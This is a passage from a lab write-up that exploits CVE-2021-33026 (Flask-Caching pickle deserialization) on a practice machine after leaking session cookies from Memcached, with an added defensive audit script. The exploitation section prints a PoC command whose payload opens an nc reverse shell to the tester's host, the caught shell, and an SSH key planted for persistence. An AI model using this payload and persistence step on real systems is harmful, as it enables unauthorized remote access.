CVE-2021-33026


During enumeration of the Memcached service on the target system's port 11211, slab 3 was found to contain session cookies stored as cache items. Both the web application on port 80 and the Flask application on port 5000 use the same type of session cookie. The Flask application, however, presents the higher risk because it is affected by the known vulnerability CVE-2021-33026.


First, a valid session cookie is required: session=e198fe78-89d9-4115-bb59-eb9c66f6615f
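Added example (not from the original writeup or the PoC script): a Python check that parses a Memcached "stats cachedump" reply and flags the two conditions that make this setup dangerous, session identifiers readable from the cache and pickle-serialized values that a vulnerable Flask-Caching instance loads blindly. It assumes the key layout seen above (session:<uuid>) and constructs its own sample data so it runs offline; on a live host the dump text would come from the Memcached instance on port 11211.

```python
import pickle
import re

# Constructed sample of a "stats cachedump" reply from an exposed Memcached
# (not captured from the page's target); key names follow the page's pattern.
SAMPLE_CACHEDUMP = (
    b"ITEM session:e198fe78-89d9-4115-bb59-eb9c66f6615f [35 b; 0 s]\r\n"
    b"ITEM flask_cache_view//index [17 b; 0 s]\r\n"
    b"END\r\n"
)

# Constructed sample values: a genuine pickle stream for the session key
# (what a vulnerable Flask-Caching instance would unpickle) and plain JSON.
SAMPLE_VALUES = {
    b"session:e198fe78-89d9-4115-bb59-eb9c66f6615f": pickle.dumps({"user": "jerry"}, protocol=4),
    b"flask_cache_view//index": b'{"user": "jerry"}',
}

ITEM_RE = re.compile(rb"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")

def parse_cachedump(raw: bytes):
    """Return [(key, size_bytes, expiry_seconds)] from a cachedump reply."""
    items = []
    for line in raw.split(b"\r\n"):
        m = ITEM_RE.match(line)
        if m:
            items.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return items

def looks_like_pickle(value: bytes) -> bool:
    """Pickle protocol 2..5 streams begin with the PROTO opcode 0x80 and a version byte."""
    return len(value) >= 2 and value[0] == 0x80 and 2 <= value[1] <= 5

def audit_items(raw_dump: bytes, values: dict):
    """Flag session keys (identifiers leak to anyone who can reach port 11211)
    and pickle-serialized values (anyone who can write to the cache can swap in
    a malicious stream, the root cause behind CVE-2021-33026)."""
    findings = []
    for key, _size, _expiry in parse_cachedump(raw_dump):
        if key.startswith(b"session:"):
            findings.append((key, "session identifier readable from cache"))
        if looks_like_pickle(values.get(key, b"")):
            findings.append((key, "pickle-serialized value"))
    return findings

if __name__ == "__main__":
    for key, issue in audit_items(SAMPLE_CACHEDUMP, SAMPLE_VALUES):
        print(f"{key.decode()}: {issue}")
```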

Exploitation


┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ python3 CVE-2021-33026/cve-2021-33026_PoC.py --rhost $IP --rport 5000 --cookie "session:e198fe78-89d9-4115-bb59-eb9c66f6615f" --cmd 'mkfifo /tmp/crmj; nc 192.168.45.153 5000 0</tmp/crmj | /bin/sh >/tmp/crmj 2>&1; rm /tmp/crmj'
 ____ ___ ____ _  ___     _____         
|  _ \_ _/ ___| |/ / |   | ____|        
| |_) | | |   | ' /| |   |  _|    _____ 
|  __/| | |___| . \| |___| |___  |_____|
|_|  |___\____|_|\_\_____|_____|        
                                        
 __  __ _____ __  __  ____    _    ____ _   _ _____ ____   
|  \/  | ____|  \/  |/ ___|  / \  / ___| | | | ____|  _ \  
| |\/| |  _| | |\/| | |     / _ \| |   | |_| |  _| | | | | 
| |  | | |___| |  | | |___ / ___ \ |___|  _  | |___| |_| | 
|_|  |_|_____|_|  |_|\____/_/   \_\____|_| |_|_____|____/  
                                                           
  ____   ___ ___ ____   ___  _   _ ___ _   _  ____  
 |  _ \ / _ \_ _/ ___| / _ \| \ | |_ _| \ | |/ ___| 
 | |_) | | | | |\___ \| | | |  \| || ||  \| | |  _  
 |  __/| |_| | | ___) | |_| | |\  || || |\  | |_| | 
 |_|    \___/___|____/ \___/|_| \_|___|_| \_|\____| 
                                                    
Sucess!

Executing the exploit script with the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ nnc 5000
listening on [any] 5000 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.219.59] 51472
whoami
jerry
hostname
shifty
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:d3:9d brd ff:ff:ff:ff:ff:ff
    inet 192.168.219.59/24 brd 192.168.219.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the jerry user by exploiting CVE-2021-33026

jerry@shifty:/opt/backups$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ ssh jerry@$IP -i ~/.ssh/id_ed25519
The authenticity of host '192.168.219.59 (192.168.219.59)' can't be established.
ED25519 key fingerprint is SHA256:m7DIwMEn9vAjxI8NfQb2e2QAj3ezJ23F8hgt8bGLOOM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.219.59' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Linux shifty 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1+deb9u1 (2020-06-07) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
jerry@shifty:~$ 

SSH